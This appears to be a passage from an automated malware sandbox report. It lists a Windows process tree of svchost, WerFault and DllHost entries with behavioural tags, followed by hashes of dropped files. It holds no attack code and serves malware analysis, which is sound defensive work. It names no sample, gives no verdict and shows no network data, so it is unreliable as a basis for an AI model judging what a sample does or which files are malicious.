C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2068
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1912
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1236
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2180 -ip 21802⤵PID:2572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3960 -ip 39602⤵PID:1460
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 4232 -ip 42322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4968
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 3244 -ip 32442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4944
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 4968 -ip 49682⤵PID:1080
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 3396 -ip 33962⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1384
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 2120 -ip 21202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3212
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3380
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4436
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3396
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3396 -s 4842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:212
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2120
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2120 -s 4842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5028
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5ae76098c6d5b7520038e0401fd75622f
SHA1f37f6872cd6575b4d56e860bcd52dee1bbdfe32f
SHA256d293c67cc99a7f2a04256c490e8029feda2c6e5f28ae126142266ed8ac7ed211
SHA5120820cddadc1bcfe6bf59a98280f135acdbee7c400dffdbb3573f26e67ff869908ee61bb5e04fa672871691a08ec034d29e15db0501a013cfcf091fd426f4179c
-
Filesize
13KB
MD5d1dd6149957a50763ee4d6c9ade52bbe
SHA1430e19e5bd828ca7af11505278ce5500f631c841
SHA2560c4606f90d9ad821bab319513c61eed7bad8f7a8579e12a008abecf5445d2093
SHA51272b135551c4fdb4120855527b577ff78b661d9b6d5a4ff1bd8a1f78662bb5417810f5e68d30442c5597a814de2ce242caa80443bc400f2fecf3335790a6aaf37
-
Filesize
36KB
MD5b6d0f8b27df7487813a5d7d66c9ba405
SHA12e98ff96a51954ae889c084d670d8a3600a9ecdc
SHA256c20cec39d80032c8fb22b30c0f05b4072ef43a9f02ac3013692561cfc4d5709e
SHA512943dbf03a3048d4de6ca54e66bfaf96bdfcf7869af42399e5ca5ac41405e360f4efc87bfbfcbd3409a8eaf8d065ed9e124b881cf9ced4ea81ac6f33dd45eab8f
-
Filesize
13KB
MD5a0b0baca1685a39661be3c60b537e2e4
SHA1a863e289c2cd9952bc26cf7a22480a5ba3554c48
SHA2565081cdc7bda34f8530a6d138cbdfb3eaf36bd53676a8ea3d235bc9ca29b81a61
SHA5120c162a1829cbe98f0669003e4884de422cfb738c2c7c5aee3520334945aee169e40543dd653f681c0ed5780831b3827b6b8fbb333a45dbd18d54880a8073f68b
-
Filesize
37KB
MD551cc60e8f5fc7a45a7b4eeee5696585a
SHA19ea2628afed1998a86762705f66d5a0c48b38ae9
SHA2561606904b4adfecd05b69395315f2696cec22ff501ee588577782944d6c79f9c6
SHA512aabd1e4d3e0480f179a4e33f8e4f80223e7a9bad19eb8b8b0f80967ce8589972fadf4af1429dd74e133493999e3933428c619751ca36e0327b0a41316ca70e97
-
Filesize
37KB
MD5f78f951a7aa0393a5fe67e2da91b24e2
SHA161272307aba4375717ca811973d37fe109be5665
SHA2560d25387d905b9c4bf8d61c6dee72932fb7f8b74d1e9de94b0207c8321cc63bea
SHA5126f8a85a5e00cec95ba1abccbf80b0a67125aa0e3a76bd6cd3ed08c6bcac5302f46d008fbea75d232f2edbf8b5ef82d91e21c65b0f7a7499987a2b12698518f6b
-
Filesize
13KB
MD5fc1803b8c32ee25c1cd34c30bec1bf51
SHA108b44b2995d52eb201bee1fc5b442b6e7ee3b972
SHA25683f66bc1a45410bbd5c58f9296aefa905f707076703bb0b8e8a9af1bd7b452ea
SHA51294b65c73c8d44125886f551fe3812246d672bc2e024b6906d86cb2eb50bd4062265f8bcc6a41d93a0b19cfa888c775773aac2b85a6ba37b84ecd292af9ff4cbb
-
Filesize
13KB
MD5696f64881edc76300cf39fa91e8600d8
SHA1585adc41ffa10323594d4a8cc0817a5fedd3aac1
SHA2561ab98986f663abda4f9c7d6f9f7d2a8cb6c6a8626efeee4b791380a87746fa4d
SHA512199623b1d13f86bd4687ebe05ed328b0b273ef2a8e5716df3f15eb666c4013eee81752624f400df8eabe4eaabe17a029781f9e12405edb2881e570d4331018aa
-
Filesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
19KB
MD511529dff888a69eb5c595b1dce6c8d28
SHA1f278be199c42ac2c5b1193c147d730ca7439f869
SHA2568c2257c4de23cb323fdff452937901ae40c10fc23c6e4486e755887f5c48b84d
SHA51261d72c45617c2af55e3a90cb64716a1d0a8da694e77d3db0cf9230e4ca6d6504b1fe24e0e07d585557407eaa1ed539c506a77a67f7e33a318babc1ef06641f39
-
Filesize
1KB
MD5c697637a9b17f577fccd7e83a5495810
SHA104e6054584786b88994b0e0a871562227fe2a435
SHA25654992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
SHA51266f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0
-
Filesize
8KB
MD590881b07c7af1bf44e62290ee1323384
SHA1260110b09048d817a50415a0c951f84538143926
SHA2562987a1fa54af515b413cf5ec848387eb77a0fea5e294492bcc84ad0ed3e1d875
SHA512eeefa21a1c6c402c674d734e55403280a4c971128037459baf5884e2cfd764758e7fa45820ac9e862b3b8d05981faa5b89bbf355d75d27633dbe96058fce6d6b
-
Filesize
512KB
MD561a33967c1c1b8fc9568008fe3cd0066
SHA14d78750e2d074162c8a7d160c567f1ddb20b9ddc
SHA256d42afb103fce7704be55754d352eca878a237f9760af4604a16bd0e5c09de1c0
SHA5120a7b5403f5fbd0b23b47679ae35255700d503add93d055d489b6908d2fa8b2b0a29c624e21681b6573ae2afd468f19e375b8b6263c03710abe936329d253ecbb
-
Filesize
14.0MB
MD5fe18c97c4c7d1c9c34c8070dd22130d9
SHA10063e4865f6a8cef0d45bebc9e917fccc1c81e85
SHA2563b3a1400a4b5ef2516745ff696949bef8d086e593c178eabf753b6b88f4b5117
SHA512028cad9fa50045fcfd6c3f7721f8ec60359039d7105185c88dcb67811db44177e156c052173da24cc4140a1703496f64b9a572f607567120aee59dd113a58625
-
Filesize
16KB
MD5832bd934dccfc69b62f8a077ec9d3a7e
SHA1e374096cf56bd307ca41b5f88a27995e01f58b60
SHA256a059a6fa4c84b2124204f39ba79c4f68b4f31fca65c624ec7ead489afb0ab984
SHA51269bbdfece0f5472fd4bc16ab5f6f097e7b79abb406f110846becc5b7b37f753488f8e6b0cdfa571057cad7395a8cca682511dd84a6ae3f27022ec5dbef474ad4
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
674KB
MD5e479ecb1802253a4c94767c8af306baf
SHA1846bb5d88b91b8aa17bdb58eaf246b10e6586402
SHA256b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679
SHA512b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373
-
Filesize
674KB
MD5e479ecb1802253a4c94767c8af306baf
SHA1846bb5d88b91b8aa17bdb58eaf246b10e6586402
SHA256b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679
SHA512b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
2KB
MD54ac8a26e2cee1347880edccb47ab30ea
SHA1a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a